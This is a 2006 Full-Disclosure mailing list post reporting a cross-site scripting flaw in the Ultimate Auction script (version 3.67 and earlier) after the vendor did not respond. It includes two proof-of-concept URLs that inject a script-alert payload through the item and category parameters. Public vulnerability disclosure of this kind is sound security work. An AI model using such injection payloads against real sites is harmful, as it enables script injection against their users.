Full Disclosure mailing list archives
Ultimate Auction <=3.67
From: Querkopf <druck_von_rechts () gmx de>
Date: Sun, 15 Jan 2006 16:41:19 +0000
Hello! I've found a XSS in Ultimate Auction <=3.67. The Vendor was informed mid October 2005! They still haven't fix the script and doesn't reply to mails. Here's a little Example: http://www.ultimate-auction.de/cgi-local/auktion/item.pl/item.pl?item=<script>alert("XSS")</script> http://www.ultimate-auction.de/cgi-local/auktion/itemlist.pl?category=<script>alert("XSS")</script> The bug has the BID 16239 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Ultimate Auction <=3.67 Querkopf (Jan 15)